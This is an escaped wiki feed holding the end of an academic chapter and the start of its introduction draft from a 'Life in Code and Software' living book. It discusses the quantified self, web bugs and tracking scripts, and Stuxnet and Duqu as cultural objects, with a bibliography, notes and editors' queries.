We might also think about the addressee of these wider computational systems made up of arrays or networks of compactants, which in many cases is a future actor. Within the quantified-self movement there is an explicit recognition that the “future self” will be required to undo bad habits and behaviours of the present-self. That is, that there is an explicit normative context to a ''future'' self, who you, as the ''present'' self may be treating unfairly, immorally or without due regard to, what has been described as 'future self continuity' (Tugend, 2012). This inbuilt tendency toward the ''futural'' is a fascinating reflection of the internal temporal representation of time within computational systems, that is time-series structured streams of real-time data, often organised as lists. Therefore the past (as stored data), present (as current data collection, or processed archival data), and future (as both the ethical addressee of the system and potential provider of data and usage) are often deeply embedded in the code that runs these systems. In some cases the future also has an objective existence as a probabilistic projection, literally a ''code-object'', which is updated in real-time and which contains the major features of the future state represented as a model; computational weather prediction systems and climate change models are both examples of this. &lt;br /&gt;
&lt;br /&gt;
There are many examples of how attending to the code and software that structures many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights into both our usage of code and software, but also the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not fully been incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline and its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attests. Of course, this code/software research is not easy, the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities we are still developing our understanding. But this should give hope and direction to the critical theorists, both of the present looking to provide critique and counterfactuals, but also ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0,Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture&amp;amp;nbsp;Desire, ''TechCrunch'',accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress,accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994. The cyber-road not taken. ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012,&amp;amp;nbsp; http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about) &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Harraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lunapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. S. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the interal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that has been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious, for instance Cryptome (2010) argues: It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4693</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4693"/>
		<updated>2012-04-18T12:23:23Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such we need to take account of this new computational envornment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; 